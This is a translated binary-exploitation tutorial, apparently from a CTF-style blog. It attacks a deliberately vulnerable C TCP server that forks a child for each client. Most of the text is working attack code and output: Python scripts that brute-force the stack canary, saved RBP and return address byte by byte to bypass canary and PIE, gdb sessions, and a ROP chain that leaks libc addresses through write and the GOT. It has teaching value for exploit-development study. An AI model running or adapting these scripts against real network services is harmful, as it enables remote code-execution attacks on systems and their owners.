Going All In Against Common Protection Mechanisms: PIE && Canary


Translation notice
This article is a translation. Original author: Shivam Shrirao. Source: https://www.ret2rop.com
Original article: https://www.ret2rop.com/2020/05/canary-pie-byte-bruteforce.html

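Case study

Previously, with canary and PIE disabled, we leaked a libc address through the GOT and used it to identify the libc version. Now we raise the difficulty: bypassing all the protections (canary, PIE and DEP) on a remote 64-bit server.

The test source code is as follows: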
```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void handle_request(int cfd){
    char prompt[] = "Enter message: ";
    char msg[200];
    write(cfd, prompt, strlen(prompt));
    read(cfd, msg, 1024);                       // reads up to 1024 bytes into the 200-byte msg: the overflow.
    // process the message.
}

int main(int argc, char const *argv[])
{
    int PORT=0;
    if(argc > 1){
        PORT = atoi(argv[1]);                   // get port to listen on from first argument.
    }
    if(!PORT){
        PORT=8888;
    }
    int sfd,opt=1,cfd;
    if((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){    // initialize tcp server socket file descriptor.
        printf("[!] socket failed.\n");
        exit(-1);
    }
    struct sockaddr_in s_addr;                  // struct to hold server socket configurations.
    if(setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt)) < 0){    // allow the address and port to be reused.
        printf("[!] setsockopt failed.\n");
        exit(-1);
    }
    s_addr.sin_family=AF_INET;
    s_addr.sin_port=htons(PORT);
    s_addr.sin_addr.s_addr=INADDR_ANY;          // any available address (listens on all interfaces i.e. 0.0.0.0)
    if(bind(sfd,(struct sockaddr *)&s_addr, sizeof(s_addr)) < 0){   // bind to the port
        printf("[!] bind failed.\n");
        exit(-1);
    }
    if(listen(sfd,10) < 0){                     // start listening for connections.
        printf("[!] listen failed.\n");
        exit(-1);
    }
    char sip[INET_ADDRSTRLEN];
    inet_ntop(AF_INET, &(s_addr.sin_addr), sip, INET_ADDRSTRLEN);   // server ip address
    printf("[i] Listening on %s:%d, sfd is %d\n", sip, PORT, sfd);
    struct sockaddr_in c_addr;                  // struct to hold client.
    socklen_t addr_len = sizeof(c_addr);
    while(1){
        if((cfd = accept(sfd,(struct sockaddr *)&c_addr,(socklen_t *)&addr_len)) < 0){  // accept connection from client
            printf("[!] accept failed.\n");
        }
        else{
            pid_t pid;
            if((pid=fork()) == 0){              // fork, create new child process to handle the request.
                close(sfd);                     // close server file descriptor in child.
                char cip[INET_ADDRSTRLEN];
                int cport = ntohs(c_addr.sin_port);     // client port
                inet_ntop(AF_INET, &(c_addr.sin_addr), cip, INET_ADDRSTRLEN);   // client ip address
                printf("[*] Accepted, cfd %d from %s:%d, pid: %d\n", cfd, cip, cport, getpid());
                handle_request(cfd);
                char closing[] = "Request complete, Closing...\n";
                write(cfd, closing, strlen(closing));   // closing message.
                close(cfd);
                exit(0);                        // exit child after client is served.
            }
            else{
                signal(SIGCHLD,SIG_IGN);        // ignore child exit status so children are reaped (no zombies).
                close(cfd);                     // close connection in parent process.
            }
        }
    }
    close(sfd);                                 // program won't actually reach this.
    return 0;
}
```
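The complete code is available as msg_server.c.

This is a very simple TCP server: it reads a message from the client and processes it. It can also serve multiple clients by forking a child process for each one (forking per connection is not actually very efficient for parallel processing; real-world servers more commonly use multiprocessing and multithreading).

Compile it with gcc: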
gcc version 9.3.0
$ gcc msg_server.c -o msg_server

Check which protections the binary has.
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : ENABLED
RELRO : Partial

Run the program with the following command:
$ ./msg_server 8888
[i] Listening on PORT 8888, sfd is 3

Try connecting with netcat.
$ nc 127.0.0.1 8888 -v
localhost [127.0.0.1] 8888 (ddi-tcp-1) open
Enter message: hello server
Request complete, Closing...

Once the connection succeeds, the server side prints:
$ ./msg_server 8888
[i] Listening on 0.0.0.0:8888, sfd is 3
[*] Accepted, cfd 4 from 127.0.0.1:51306, pid: 106227

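You can also try connecting several clients at the same time.

The figure below shows the IDA disassembly view. After the server accepts a connection it forks a child process, which first prints some information about the client and then calls the 'handle_request' function to handle the client's request.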
::: hljs-center

1.png

:::

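If you are not familiar with the fork system call, see the manual (man 2 fork) or search online. fork() creates a process that is almost an exact copy of the original, and parent and child run in isolated memory, independent of each other.

Inside handle_request, we can see that it reads 1024 bytes from the client into a buffer that is only 200 bytes long. This is a classic buffer overflow, but because the program has canary protection enabled, overflowing the buffer also overwrites the canary. The function checks the canary before returning; if the check fails, the program aborts with the message "stack smashing detected".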

::: hljs-center

2.png

:::

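Unless we can leak the canary value, the program will abort on the failed canary check even though the overflow itself works.

Partial overwrite

We know the canary sits right after the buffer: the first 200 bytes are the buffer, and the canary starts at byte 201. So a 201-byte payload overwrites exactly one byte of the canary and makes the stack check fail.

We load the binary in gdb and set follow-fork-mode to child so that gdb automatically attaches to the child process on fork. To stay with the parent instead, set it to parent. You can also attach to a child that is already running, using attach (or at) followed by the child's pid, but that may require elevated privileges or a check of the ptrace_scope setting (configured under /etc/sysctl.d/).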

$ gdb msg_server -q
Reading symbols from msg_server...
(No debugging symbols found in msg_server)
gdb-peda$ set follow-fork-mode child
gdb-peda$ disas handle_request
Dump of assembler code for function handle_request:
0x0000000000001269 <+0>: push rbp
0x000000000000126a <+1>: mov rbp,rsp
0x000000000000126d <+4>: sub rsp,0xf0
0x0000000000001274 <+11>: mov DWORD PTR [rbp-0xe4],edi
0x000000000000127a <+17>: mov rax,QWORD PTR fs:0x28
0x0000000000001283 <+26>: mov QWORD PTR [rbp-0x8],rax
0x0000000000001287 <+30>: xor eax,eax
0x0000000000001289 <+32>: movabs rax,0x656d207265746e45
0x0000000000001293 <+42>: movabs rdx,0x203a6567617373
0x000000000000129d <+52>: mov QWORD PTR [rbp-0xe0],rax
0x00000000000012a4 <+59>: mov QWORD PTR [rbp-0xd8],rdx
0x00000000000012ab <+66>: lea rax,[rbp-0xe0]
0x00000000000012b2 <+73>: mov rdi,rax
0x00000000000012b5 <+76>: call 0x1080 <strlen@plt>
0x00000000000012ba <+81>: mov rdx,rax
0x00000000000012bd <+84>: lea rcx,[rbp-0xe0]
0x00000000000012c4 <+91>: mov eax,DWORD PTR [rbp-0xe4]
0x00000000000012ca <+97>: mov rsi,rcx
0x00000000000012cd <+100>: mov edi,eax
0x00000000000012cf <+102>: call 0x1060 <write@plt>
0x00000000000012d4 <+107>: lea rcx,[rbp-0xd0]
0x00000000000012db <+114>: mov eax,DWORD PTR [rbp-0xe4]
0x00000000000012e1 <+120>: mov edx,0x400
0x00000000000012e6 <+125>: mov rsi,rcx
0x00000000000012e9 <+128>: mov edi,eax
0x00000000000012eb <+130>: call 0x10d0 <read@plt>
0x00000000000012f0 <+135>: nop
0x00000000000012f1 <+136>: mov rax,QWORD PTR [rbp-0x8]
0x00000000000012f5 <+140>: xor rax,QWORD PTR fs:0x28 ; canary is checked here
0x00000000000012fe <+149>: je 0x1305 <handle_request+156>
0x0000000000001300 <+151>: call 0x1090 <__stack_chk_fail@plt>
0x0000000000001305 <+156>: leave
0x0000000000001306 <+157>: ret
End of assembler dump.
gdb-peda$ b *handle_request+140 # set breakpoint at check
Breakpoint 1 at 0x12f5
gdb-peda$ r
Starting program: /home/archer/compiler_tests/msg_server
[i] Listening on 0.0.0.0:8888, sfd is 3
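
The 200-byte offset can be cross-checked against the disassembly above: read() is given a buffer at rbp-0xd0, and the canary is stored at rbp-0x8. The following is a minimal sketch of that arithmetic; the variable names are ours and do not appear in the original scripts.

```python
# Offsets read off the handle_request disassembly, relative to rbp.
BUF_OFFSET = 0xd0       # lea rcx,[rbp-0xd0]  -> buffer handed to read()
CANARY_OFFSET = 0x8     # mov QWORD PTR [rbp-0x8],rax  -> canary slot

pad_to_canary = BUF_OFFSET - CANARY_OFFSET  # filler bytes before the canary
pad_to_rbp = pad_to_canary + 8              # the canary occupies 8 bytes
pad_to_ret = pad_to_rbp + 8                 # the saved RBP occupies 8 bytes

print(pad_to_canary, pad_to_rbp, pad_to_ret)
```

The same three offsets are where the canary, saved RBP and return address are placed in the payloads later on.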

Now let's test it. We first send a 201-byte payload: 200 bytes of 'A' followed by one 'B' (0x42), which overwrites a single byte of the canary.
::: hljs-center

3.jpg

:::

```
#!/usr/bin/env python3

import socket

TRGT = ('192.168.0.6', 8888)    # ip and port

buf  = b'A'*200
buf += b'B'                     # overwrite canary's first byte with B

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # create TCP socket
s.connect(TRGT)                 # connect to target
s.recv(1024)                    # receive initial prompt
s.send(buf)                     # send payload
ret = s.recv(1024)              # receive response
print(ret)
```

The complete code is at [partial_test.py](https://gist.github.com/ShivamShrirao/86398099214d7e8717ee91cad0af3445#file-partial_test-py).

After running the Python script we see the following. The canary is in the rax register, and its first byte has been overwritten with 'B'. If you continue execution, the program terminates with "stack smashing detected".

```
[Attaching after process 566648 fork to child process 566654]
[New inferior 2 (process 566654)]
[Detaching after fork from parent process 566648]
[Inferior 1 (process 566648) detached]
[*] Accepted, cfd 4 from 192.168.0.6:46268, pid: 566654
[Switching to process 566654]
[----------------------------------registers-----------------------------------]
RAX: 0x8564c5f6ec932442 <== stack canary overwritten by 42(B)
RBX: 0x0
RCX: 0x7ffff7eadab2 (: cmp rax,0xfffffffffffff000)
RDX: 0x400
RSI: 0x7fffffffdb10 ('A' ...)
RDI: 0x4
RBP: 0x7fffffffdbe0 --> 0x7fffffffdc90 --> 0x5555555555e0 (<__libc_csu_init>: endbr64)
RSP: 0x7fffffffdaf0 --> 0x0
RIP: 0x5555555552f5 (: xor rax,QWORD PTR fs:0x28)
R8 : 0x0
R9 : 0x38 ('8')
R10: 0x555555554602 --> 0x7465730064616572 ('read')
R11: 0x246
R12: 0x555555555170 (<_start>: endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x5555555552eb : call 0x5555555550d0 read@plt
0x5555555552f0 : nop
0x5555555552f1 : mov rax,QWORD PTR [rbp-0x8]
=> 0x5555555552f5 : xor rax,QWORD PTR fs:0x28
0x5555555552fe : je 0x555555555305
0x555555555300 : call 0x555555555090 __stack_chk_fail@plt
0x555555555305 : leave

0x555555555306 : ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdaf0 --> 0x0
0008| 0x7fffffffdaf8 --> 0x400000000
0016| 0x7fffffffdb00 ("Enter message: ")
0024| 0x7fffffffdb08 --> 0x203a6567617373 ('ssage: ')
0032| 0x7fffffffdb10 ('A' <repeats 200 times>...)
0040| 0x7fffffffdb18 ('A' <repeats 192 times>, "B$\223\354\366\305d\205"...)
0048| 0x7fffffffdb20 ('A' <repeats 184 times>, "B$\223\354\366\305d\205\220\334\377\377\377\177")
0056| 0x7fffffffdb28 ('A' <repeats 176 times>, "B$\223\354\366\305d\205\220\334\377\377\377\177")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "msg_server" hit Breakpoint 1, 0x00005555555552f5 in handle_request ()
gdb-peda$ c
Continuing.
*** stack smashing detected ***: terminated

Thread 2.1 "msg_server" received signal SIGABRT, Aborted.
```
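To complete the overflow attack we need to guess the canary. A byte ranges from 0x00 to 0xff, 256 possibilities in all, so at most 256 attempts are needed to brute-force one byte.

But there is another tricky problem. Whenever the stack check fails, the program calls __stack_chk_fail and the process is terminated. When the program is run again it gets a new canary, and the previous value is useless.

Brute-forcing byte by byte

As described earlier, the parent process listens for connections and forks a child to handle each client request. The overflow happens in the child handling the request, so it is the child that dies when the canary is corrupted. The parent keeps listening for new connections and forking new children. More importantly, since each child is a copy of the parent, they all share the same canary value.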
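
The effect of fork on per-process secrets can be illustrated without the server. The sketch below is only an analogy: a random value generated once in the parent stands in for the canary, and the helper name child_view is hypothetical. It assumes a Unix-like system where os.fork is available.

```python
import os

secret = os.urandom(8)              # stand-in for the parent's canary

def child_view():
    """Fork once and return the secret as seen from inside the child."""
    read_end, write_end = os.pipe()
    pid = os.fork()
    if pid == 0:                    # child: report its copy of the secret and exit
        os.close(read_end)
        os.write(write_end, secret)
        os._exit(0)
    os.close(write_end)             # parent: collect what the child saw
    data = os.read(read_end, 8)
    os.close(read_end)
    os.waitpid(pid, 0)
    return data

views = [child_view() for _ in range(3)]
print(all(view == secret for view in views))
```

Every child reports the same bytes because fork copies the parent's memory; a fresh value would only appear if the parent itself were restarted.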

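By repeatedly brute-forcing the canary in child processes, we indirectly obtain the parent's canary. If a guess hits the correct byte, the child behaves normally: it sends its closing message and closes the connection cleanly. When we see that normal response, we move on to the next byte and repeat, until all 8 bytes of the canary are recovered. In the worst case that takes 256*8 = 2048 attempts; in practice we need fewer, as the following sections show.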
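
To make the byte-by-byte idea concrete, here is a small offline simulation. The oracle function is a hypothetical stand-in for the server: it returns True when every overwritten byte matches, which corresponds to the child surviving and sending its closing message. No network is involved, and the secret is random test data.

```python
import os

SECRET = b"\x00" + os.urandom(7)    # simulated canary; lowest byte is 0x00

def oracle(guess: bytes) -> bool:
    """True if the partially overwritten canary would still pass the check."""
    return SECRET.startswith(guess)

def brute_force(known: bytes = b"", length: int = 8):
    attempts = 0
    while len(known) < length:
        for val in range(0x100):            # try every value for the next byte
            attempts += 1
            if oracle(known + bytes([val])):
                known += bytes([val])       # keep the byte and move on
                break
        else:
            raise RuntimeError("no candidate matched")
    return known, attempts

recovered, attempts = brute_force()
print(recovered == SECRET, attempts)
```

Because each byte is confirmed independently, the cost grows linearly with the number of bytes (at most 256 per byte) instead of exponentially.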

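Optimizing the canary brute force

Running the program several times and inspecting the canary at a breakpoint shows that the brute force can be optimized further. Here are some sample values: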
0xc5e1de93dc0f3c00
0xa276c81bfbeefe00
0x09368174f1139400
0x8564c5f6ec932400
0x6b420d65bbf27d00
0x847149724750a000

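You may notice that the canary always ends in 00, i.e. its least significant byte, which comes first in memory, is a null byte. This is done to keep the canary from leaking. Suppose a string sits just before the canary: normally it ends with a 00 terminator, but if we maliciously fill the whole string buffer and the program later prints the string, then with no terminator in the way the canary would be printed along with it. The canary's own null byte stops that. In our example the data is read with read, which does not stop at null bytes, so this does not get in our way.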
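
The role of the null byte can be sketched with a toy model of the stack. The helper c_string_at is hypothetical and only mimics how a C string print stops at the first null byte; the first canary is one of the sample values listed above, and the second is a made-up value without a null byte.

```python
from struct import pack

def c_string_at(memory: bytes, start: int) -> bytes:
    """Read bytes the way a C string print would: stop at the first null byte."""
    end = memory.index(b"\x00", start)
    return memory[start:end]

canary = pack("<Q", 0x8564c5f6ec932400)     # sample canary, low byte 0x00
stack = b"A" * 200 + canary                 # buffer completely filled, no terminator
print(len(c_string_at(stack, 0)))           # stops right before the canary

no_null = pack("<Q", 0x8564c5f6ec932441)    # hypothetical canary without a null byte
leaky_stack = b"A" * 200 + no_null + b"\x00"
print(len(c_string_at(leaky_stack, 0)))     # runs through all 8 canary bytes
```

In the first case the print ends after the 200 filler bytes; in the second it would also emit the canary.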

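We now have a plan for leaking the canary, but that is far from enough. We still need ROP gadgets to leak a libc address, and because the binary is built with PIE, ASLR is in effect too (PIE only takes effect when ASLR is enabled).

After the canary comes the 8-byte saved RBP, which is a stack address. After RBP comes the return address. Although the base address changes on every run, the relative offsets within the program do not, so leaking a single address, such as the return address in the stack frame, lets us compute the base address and thereby bypass PIE. We again use brute force, one byte at a time.

Optimizing the script

To look for patterns, enter the following command in gdb: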
gdb-peda$ aslr on

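After a few runs you will notice something interesting:

1. The top three bytes of RBP, "00 00 7f", never change, and the fourth byte also follows a pattern: it always lies between "fc" and "ff". This greatly reduces the brute-force effort; at most 4 + 256*4 = 1028 attempts are needed.

2. The top two bytes of the return address, "00 00", never change, and the third byte is always '55' or '56', which narrows the search further. PIE has one more weakness: memory is mapped in pages, so the randomization only applies at page granularity. With a page size of 0x1000, the last three hex digits of any instruction's address stay the same no matter how the base moves. We now need at most 2 + 256*3 + 16 = 786 attempts to brute-force the return address.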
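
The worst-case attempt counts from these observations can be tallied in a few lines. This is only the arithmetic from the text; the variable names are ours.

```python
# Canary: lowest byte is always 0x00, the other 7 bytes are unknown.
canary_tries = 256 * 7

# RBP: top three bytes fixed (00 00 7f), next byte in fc..ff, 4 bytes unknown.
rbp_tries = 4 + 256 * 4

# Return address: top two bytes fixed, next byte 55 or 56, 3 bytes unknown,
# one byte with a known low nibble (16 candidates), lowest byte known.
ret_tries = 2 + 256 * 3 + 16

total = canary_tries + rbp_tries + ret_tries
print(canary_tries, rbp_tries, ret_tries, total)
```

Even in the worst case the whole leak stays within a few thousand connections, which is why it finishes quickly.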

We can statically disassemble main to find the address that handle_request returns to:
gdb-peda$ disas main
Dump of assembler code for function main:
.
.
0x000000000000154d <+582>: call 0x1269 <handle_request>
0x0000000000001552 <+587>: movabs rax,0x2074736575716572
^^^== return address

Because of this weakness in PIE, the last three hex digits of the return address, '552', never change.
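
Once the full return address is known, the base follows by subtraction. The sketch below assumes the 0x1552 offset from the disassembly above and a sample leaked value of 0x000055ae37ba9552; the function name binary_base is ours.

```python
PAGE_SIZE = 0x1000
RET_OFFSET = 0x1552                 # main+587, taken from the static disassembly

def binary_base(leaked_ret: int) -> int:
    """Recover the load base from a leaked return address."""
    # The low 12 bits are not randomized, so they must match the static offset.
    if leaked_ret & (PAGE_SIZE - 1) != RET_OFFSET & (PAGE_SIZE - 1):
        raise ValueError("low 12 bits do not match the expected offset")
    return leaked_ret - RET_OFFSET

base = binary_base(0x000055ae37ba9552)
print(hex(base))
```

A quick sanity check on any leak is that the resulting base is page-aligned.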

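Writing the brute-force script

The idea behind the script is:
1. Overflow the buffer.
2. Brute-force the canary, RBP and return address byte by byte.
3. Use the server's response to tell whether a guess was correct; if so, move on to the next byte.
4. Find the offset through static disassembly.
5. Recover the canary and return address.
6. Subtract the fixed offset from the return address to get the base address.

To speed things up, I run the payloads with multiple threads. The right number of threads depends on your machine; reduce it if you run the script in a VM.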
```
#!/usr/bin/env python3

from struct import pack, unpack
from threading import Thread
from time import sleep
import socket
import sys

p64 = lambda x: pack("<Q", x)               # pack as 8 little-endian bytes
u64 = lambda x: unpack("<Q", x)[0]          # unpack 8 little-endian bytes

TRGT = (sys.argv[1], int(sys.argv[2]))      # ip and port as arguments
N_THREADS = 256                             # maximum number of threads, reduce according to your machine

def Threaded(fn):                           # decorator to launch a function as a thread
    def wrapper(*args, **kwargs):
        t = Thread(target=fn, args=args, kwargs=kwargs)
        t.daemon = True
        t.start()
        return t
    return wrapper

def default_range(leak):                    # default range of values
    return range(0x100)                     # 0x00 to 0xff

class FoundInstance:                        # holds the "found" flag for one particular byte
    def __init__(self):
        self.FOUND_IT = False

class Bruter:                               # class to bruteforce addresses
    def __init__(self):
        self.start = b''                    # known low bytes of the value (memory order)
        self.end = b''                      # known high bytes of the value
        self.buf = b'A'*200                 # padding up to the value being leaked
        self.msg = "Leaking : \t"           # message to print
        self.thrds = []                     # store the threads

    @Threaded                               # will make it launch as a thread
    def find_at(self, val, inst, ln_st):
        if inst.FOUND_IT:                   # this byte was already found by another thread
            return
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(TRGT)                 # connect to target
            s.recv(1024)                    # receive input prompt
            s.send(self.buf + self.start + bytes([val]))    # send payload with next attempted byte val
            ret = s.recv(1024)              # receive response
            s.close()                       # close socket
        except OSError:                     # a crashed child may reset the connection
            return
        if b'Request complete, Closing' in ret:     # check if server sent correct response
            if not inst.FOUND_IT:           # re-check the flag to guard against races
                if len(self.start) == ln_st:        # check that start was not extended meanwhile
                    self.start += bytes([val])      # add the correct byte
                    inst.FOUND_IT = True    # set flag

    def iterate_range(self, get_range):
        inst = FoundInstance()
        for val in get_range(self.start):
            self.thrds.append(self.find_at(val, inst, len(self.start)))
            print('\r' + self.msg + '0x' + self.end.hex() + ('%02x' % val + self.start[::-1].hex()).rjust(16-2*len(self.end), '0'), end=' ')
            while len(self.thrds) >= N_THREADS:     # wait if max threads are reached
                sleep(0.2)                  # wait a bit
                self.thrds = [t for t in self.thrds if t.is_alive()]   # drop finished threads
                if inst.FOUND_IT:
                    return                  # found during the while loop
            if inst.FOUND_IT:
                return                      # found during the for loop
        for t in self.thrds:                # all candidates sent: wait for outstanding answers
            t.join()
        self.thrds = []

    def __call__(self, get_range=default_range):
        len_rem = 8 - len(self.end)         # number of bytes that are not fixed by end
        while len(self.start) < len_rem:    # until all bytes are found
            self.iterate_range(get_range)   # check all values in range for the next byte
            print('\r' + self.msg + '0x' + self.end.hex() + self.start[::-1].hex().rjust(16-2*len(self.end), '0'), end='  ')
        print()
        return self.start[:len_rem] + self.end[::-1]    # return complete value in memory order

brt = Bruter()                              # initialize bruter
brt.start = b'\x00'                         # stack canary always has a 0x00 null byte first
brt.end = b''                               # no pattern for this
brt.buf = b'A'*200                          # buffer length, offset to canary
brt.msg = "Leaking CANARY:\t"

CANARY = u64(brt())                         # start bruteforce, save canary to variable

brt = Bruter()
brt.start = b''
brt.end = b'\x00\x00\x7f'                   # RBP has these constant top bytes
brt.buf = b'A'*200
brt.buf += p64(CANARY)                      # add leaked canary to payload
brt.msg = "Leaking RBP:\t"
def rbp_range(leak):
    if len(leak) == 4:                      # 5th byte of RBP changes from 0xfc to 0xff
        return range(0xfc, 0x100)
    else:
        return range(0x100)

RBP = u64(brt(rbp_range))

# Offset to return address is 0x1552

brt = Bruter()
brt.start = b'\x52'                         # return address constant byte at start
brt.end = b'\x00\x00'                       # constant bytes at end
brt.buf = b'A'*200
brt.buf += p64(CANARY)                      # add leaked canary
brt.buf += p64(RBP)                         # add leaked RBP
brt.msg = "Leaking RET:\t"
def ret_range(leak):
    if len(leak) == 1:                      # '5 52' is constant. '0x52' is already in start variable
        return range(0x5, 0x100, 0x10)      # generates values ending with '5'
    elif len(leak) == 5:
        return range(0x55, 0x57)            # 6th byte changes from '0x55' to '0x56'
    else:
        return range(0x100)

RET = u64(brt(ret_range))

BIN_BASE = RET - 0x1552                     # subtract offset of return address to get base address of binary
print("[*] Binary base calculated:\t", hex(BIN_BASE))
```

On my machine the whole process took about 5-10 seconds.
::: hljs-center

4.jpg

:::

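Leaking a libc address and identifying the libc version

We now have the base address and have bypassed PIE. The next step is to leak a libc address and then build a ROP chain from offsets. In the previous article we passed crafted arguments to printf to leak a libc address from the GOT. This time we do the same with the write function. write takes 3 arguments:
1. A file descriptor
2. A buffer
3. The number of bytes to write

Linux treats everything as a file, and all operations on devices and files go through file descriptors. The client and server communicate over a socket, which is also accessed through a file descriptor. So to call write we need the file descriptor of the socket. When the parent calls fork, the child inherits the cfd descriptor returned by accept. In our example the server prints 'cfd 4', and you will find that cfd is always 4 for every client. That is because the server forks a child for each client and, since the new client is served by the child, the parent closes the connected socket. Each child is a copy of the parent, so every child sees cfd 4.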
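
The stable descriptor number follows from how descriptors are allocated: the kernel hands out the lowest unused number, so once the parent closes cfd, the next accept gets the same number again. A minimal sketch of that behaviour, using /dev/null instead of a socket (an assumption made purely to keep the example self-contained):

```python
import os

first = os.open(os.devnull, os.O_RDONLY)    # lowest free descriptor at this moment
os.close(first)                             # free it again, as the parent does with cfd

second = os.open(os.devnull, os.O_RDONLY)   # the same number is handed out again
os.close(second)

print(first == second)
```

In the server, descriptors 0 to 2 are the standard streams and 3 is sfd, which leaves 4 as the lowest free number for every accepted client.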

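We can also read the file descriptor by setting a breakpoint where the program calls write to send its response, and reading the first argument from the rdi register.

Building the ROP chain

As noted, write takes 3 arguments, and since this is a 64-bit program they must be passed in rdi, rsi and rdx. We use the ROPgadget tool to look for usable gadgets.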
$ ROPgadget --binary msg_server | grep "pop rdi"
0x0000000000001643 : pop rdi ; ret
$ ROPgadget --binary msg_server | grep "pop rsi"
0x0000000000001641 : pop rsi ; pop r15 ; ret
$ ROPgadget --binary msg_server | grep "rdx"
0x0000000000001011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret

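We found usable pop rdi and pop rsi gadgets but no pop rdx. We can take a different approach, though: rdx only specifies the number of bytes to write from the buffer, so it is enough for rdx to already hold a suitable value when the ROP chain starts. Let's check the register values just before handle_request() returns.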
```
0x0000000000001305 <+156>: leave

0x0000000000001306 <+157>: ret

End of assembler dump.
gdb-peda$ b *handle_request+157
Breakpoint 1 at 0x1306
gdb-peda$ r
Starting program: /home/archer/compiler_tests/msg_server
[i] Listening on 0.0.0.0:8888, sfd is 3
[Attaching after process 394793 fork to child process 394798]
[New inferior 2 (process 394798)]
[Detaching after fork from parent process 394793]
[Inferior 1 (process 394793) detached]
[*] Accepted, cfd 4 from 192.168.0.6:54926, pid: 394798
[Switching to process 394798]
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7f62eb5a8ab2 (: cmp rax,0xfffffffffffff000)
RDX: 0x400 <== 1024 bytes will work
RSI: 0x7fff132fa4c0 ('A' )
RDI: 0x4 <== already has client socket file desciptor
RBP: 0x7fff132fa640 --> 0x556ea1f015e0 (<__libc_csu_init>: endbr64)
RSP: 0x7fff132fa598 --> 0x556ea1f01552 (: movabs rax,0x2074736575716552)
RIP: 0x556ea1f01306 (: ret)
R8 : 0x0
R9 : 0x38 ('8')
R10: 0x556ea1f00602 --> 0x7465730064616572 ('read')
R11: 0x246
R12: 0x556ea1f01170 (<_start>: endbr64)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x556ea1f012fe : je 0x556ea1f01305
0x556ea1f01300 : call 0x556ea1f01090 __stack_chk_fail@plt
0x556ea1f01305 : leave

=> 0x556ea1f01306 : ret

0x556ea1f01307 : push rbp
0x556ea1f01308 : mov rbp,rsp
0x556ea1f0130b : sub rsp,0xa0
0x556ea1f01312 : mov DWORD PTR [rbp-0x94],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fff132fa598 --> 0x556ea1f01552 (: movabs rax,0x2074736575716552)
0008| 0x7fff132fa5a0 --> 0x7fff132fa738 --> 0x7fff132fc1bb ("/home/archer/compiler_tests/msg_server")
0016| 0x7fff132fa5a8 --> 0x100000000
0024| 0x7fff132fa5b0 --> 0x100000000
0032| 0x7fff132fa5b8 --> 0x22b800000010
0040| 0x7fff132fa5c0 --> 0x400000003
0048| 0x7fff132fa5c8 --> 0xd68e00000000
0056| 0x7fff132fa5d0 --> 0xb8220002
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "msg_server" hit Breakpoint 1, 0x0000556ea1f01306 in handle_request ()
gdb-peda$
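```

At this point rdx holds 0x400, which means we can read 1024 bytes starting at the GOT. Great! This lets us leak several libc addresses from the GOT at once. In addition, rdi already holds '4', the file descriptor write needs, before the ROP chain runs, so we do not have to load rdi with a pop either. Finally, we use info functions and inspect the GOT to see the order of its entries. For example, if we leak 1024 bytes and the first 8 bytes are the address of write, then the next 8 bytes are the address of getpid, and so on.

```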
$ gdb msg_server -q
Reading symbols from msg_server...
(No debugging symbols found in msg_server)
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x0000000000001000 _init
0x0000000000001030 [email protected]
0x0000000000001040 [email protected]
0x0000000000001050 [email protected]
0x0000000000001060 write@plt
0x0000000000001070 getpid@plt
0x0000000000001080 strlen@plt
0x0000000000001090 __stack_chk_fail@plt
0x00000000000010a0 [email protected]
0x00000000000010b0 [email protected]
0x00000000000010c0 [email protected]
0x00000000000010d0 read@plt
0x00000000000010e0 [email protected]
0x00000000000010f0 [email protected]
0x0000000000001100 [email protected]
0x0000000000001110 [email protected]
0x0000000000001120 [email protected]
0x0000000000001130 [email protected]
0x0000000000001140 [email protected]
0x0000000000001150 [email protected]
0x0000000000001160 [email protected]
0x0000000000001170 _start
0x00000000000011a0 deregister_tm_clones
0x00000000000011d0 register_tm_clones
0x0000000000001210 __do_global_dtors_aux
0x0000000000001260 frame_dummy
0x0000000000001269 handle_request
0x0000000000001307 main
0x00000000000015e0 __libc_csu_init
0x0000000000001650 __libc_csu_fini
0x0000000000001658 _fini
gdb-peda$ disas 0x0000000000001060
Dump of assembler code for function write@plt:
0x0000000000001060 <+0>: jmp QWORD PTR [rip+0x2fca] # 0x4030 write@got.plt
0x0000000000001066 <+6>: push 0x3
0x000000000000106b <+11>: jmp 0x1020
End of assembler dump.
gdb-peda$ x/gx 0x4030
0x4030 write@got.plt: 0x0000000000001066
gdb-peda$
0x4038 getpid@got.plt: 0x0000000000001076
gdb-peda$
0x4040 strlen@got.plt: 0x0000000000001086
gdb-peda$
0x4048 __stack_chk_fail@got.plt: 0x0000000000001096
gdb-peda$
```

Append the following to the earlier brute-force script.
```
pop_rdi     = BIN_BASE + 0x1643
pop_rsi_r15 = BIN_BASE + 0x1641
ret_gad     = BIN_BASE + 0x1306

write_plt = BIN_BASE + 0x1060
write_got = BIN_BASE + 0x4030

buf  = b'A'*200
buf += p64(CANARY)
buf += p64(RBP)
buf += p64(pop_rsi_r15)         # only rsi needs loading; rdi and rdx already hold usable values
buf += p64(write_got)*2         # 2 times: once for rsi, once as filler for r15
buf += p64(write_plt)           # call write
buf += p64(RET)                 # continue execution normally

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(TRGT)
s.recv(1024)
s.send(buf)
ret = s.recv(1024)
print(ret[:128])

libc_write  = u64(ret[:8])      # first 8 bytes are the libc address of write
libc_getpid = u64(ret[8:16])    # next 8 bytes are the libc address of getpid
print("[*] Leaked libc write:\t", hex(libc_write))
print("[*] Leaked libc getpid:\t", hex(libc_getpid))
```

The complete code is available as brute_address_part2.py.

With the two parts combined, the output looks like this:
$ python brute_address.py 192.168.0.8 8888
Leaking CANARY: 0x40d4c335a6559000
Leaking RBP: 0x00007ffec5e51c90
Leaking RET: 0x000055ae37ba9552
[*] Binary base calculated: 0x55ae37ba8000
